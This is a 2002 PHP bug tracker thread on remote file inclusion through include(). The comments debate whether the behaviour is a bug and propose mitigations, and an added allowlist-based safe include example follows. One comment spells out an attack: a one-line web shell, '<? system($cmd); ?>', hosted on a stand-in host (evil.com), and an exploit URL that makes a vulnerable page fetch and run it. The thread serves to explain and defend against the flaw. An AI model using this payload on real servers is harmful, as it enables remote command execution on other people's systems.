ID:               15187
 Comment by:       rsemmens at names dot co dot uk
 Reported By:      tozz at kijkt dot tv
 Status:           Bogus
 Bug Type:         Scripting Engine problem
 Operating System: Linux 2.4
 PHP Version:      4.1.1
 New Comment:

I know this is rather an old issue, but I've found a new problem with
it.  Several correspondents report correctly that it's a user error... 
However it isn't always possible to verify user code.  I look after a
lot of shared hosting, and I've come across this:

User writes a template type page, which part way through says something
like:
<? if ($page) include ($page); else echo "Default text"; ?>

Intending obviously to specify something like sales.html as $page. 
However if a remote person writes a text file that says something
like:

<? system($cmd); ?>

And puts it on a remote server _not_ under our control you get this
problem.  Using the first example, evil person executes:
http://embrace/index.php?page=http://www.evil.com/cmd.txt&cmd=ls

Now this, as you can tell, executes locally.

The only way around that I can tell is by enabling safe mode, but that
is not exactly ideal...  It would mean disabling almost everything for
all our users.

Any ideas?  Or is there a way of disabling remote includes?

Richard.
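
An added example, not part of the original report or of any poster's code: one way to write the template include described above so that the request value is only a lookup key and never reaches include(). The page keys, the pages/ directory and the resolve_page() helper are hypothetical, and it assumes the included pages are static HTML.

```php
<?php
// Added example; page keys and the pages/ directory are hypothetical.

// Request value => local file. The request value is only ever used as
// a lookup key, so it can never become a path or a URL.
$allowed_pages = array(
    'sales'   => 'sales.html',
    'contact' => 'contact.html',
);

// Returns the allowlisted file name, or null for anything else
// (remote URLs, ../ traversal, absolute paths, array parameters).
function resolve_page($requested, $allowed)
{
    if (!is_string($requested) || !isset($allowed[$requested])) {
        return null;
    }
    return $allowed[$requested];
}

if (PHP_SAPI === 'cli') {
    // Constructed inputs, including the URL form from the report above.
    $samples = array('sales', 'http://www.evil.com/cmd.txt',
                     '../../etc/passwd', 'sales.html', array('sales'));
    foreach ($samples as $s) {
        $r = resolve_page($s, $allowed_pages);
        echo var_export($s, true), ' => ',
             ($r === null ? 'Default text' : $r), "\n";
    }
    exit;
}

$requested = isset($_GET['page']) ? $_GET['page'] : '';
$name = resolve_page($requested, $allowed_pages);
$path = ($name === null) ? null : dirname(__FILE__) . '/pages/' . $name;

if ($path !== null && is_file($path)) {
    // Static HTML does not need the PHP parser: readfile() sends the
    // bytes as-is, so the content is never executed.
    readfile($path);
} else {
    echo "Default text";
}
```

Run from the command line, the script prints how each constructed input resolves; served by the web server, it behaves as the template.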


Previous Comments:
------------------------------------------------------------------------

[2002-01-23 15:52:48] [EMAIL PROTECTED]

speaking of phpnuke...

this security problem in phpnuke was reported a while back
to its developers. if they haven't fixed it by now blame them.

------------------------------------------------------------------------

[2002-01-23 15:49:50] [EMAIL PROTECTED]

We can't stop developers from shooting themselves in the foot.  If you
want to include a remote file without parsing it locally, you would
use: 
readfile("http://domain.com/filename");
You could of course also just use the allow_url_fopen directive in your
php.ini file if you really want to turn this off.
If you removed all the functions that developers could use to shoot
themselves in the foot with there wouldn't be much left to do
interesting things.

------------------------------------------------------------------------

[2002-01-23 15:42:16] tozz at kijkt dot tv

It's true that this is a 'user error', however there are scripts (e.g.
phpnuke has this problem) that allow a user to enter the URL that will
be included. 

So, you're right, if a script is secure you won't deal with this bug... but
I still see it as a security issue

------------------------------------------------------------------------

[2002-01-23 15:37:30] [EMAIL PROTECTED]

This is bad programming. If you want to avoid this, you should NOT use
include() for stuff on other servers, but fopen() or similar instead
(which doesn't parse the data).

BTW: the 'bug' in issue.php can be avoided by proper use of
register_globals, safe-mode and/or normal (unix) file permissions.

------------------------------------------------------------------------

[2002-01-23 15:36:30] [EMAIL PROTECTED]

RTFM!

Include is for including PHP scripts into your PHP script.
If you only want to include parsed output then do not use
include.


------------------------------------------------------------------------

The remainder of the comments for this report are too long. To view
the rest of the comments, please view the bug report online at
    http://bugs.php.net/15187
